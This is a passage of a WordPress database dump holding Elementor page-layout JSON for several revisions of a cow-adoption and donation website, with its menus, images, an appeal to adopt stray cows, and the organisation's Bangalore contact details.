mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11750,1947,'_elementor_page_assets','a:0:{}'),(11753,1948,'_elementor_edit_mode','builder'),(11754,1948,'_elementor_template_type','wp-page'),(11755,1948,'_elementor_version','3.7.8'),(11756,1948,'_wp_page_template','elementor_canvas'),(11757,1948,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11758,1948,'_elementor_page_assets','a:0:{}'),(11760,1949,'_elementor_edit_mode','builder'),(11761,1949,'_elementor_template_type','wp-page'),(11762,1949,'_elementor_version','3.7.8'),(11763,1949,'_wp_page_template','elementor_canvas'),(11764,1949,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11765,1949,'_elementor_page_assets','a:0:{}'),(11767,1950,'_elementor_edit_mode','builder'),(11768,1950,'_elementor_template_type','wp-page'),(11769,1950,'_elementor_version','3.7.8'),(11770,1950,'_wp_page_template','elementor_canvas'),(11771,1950,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\"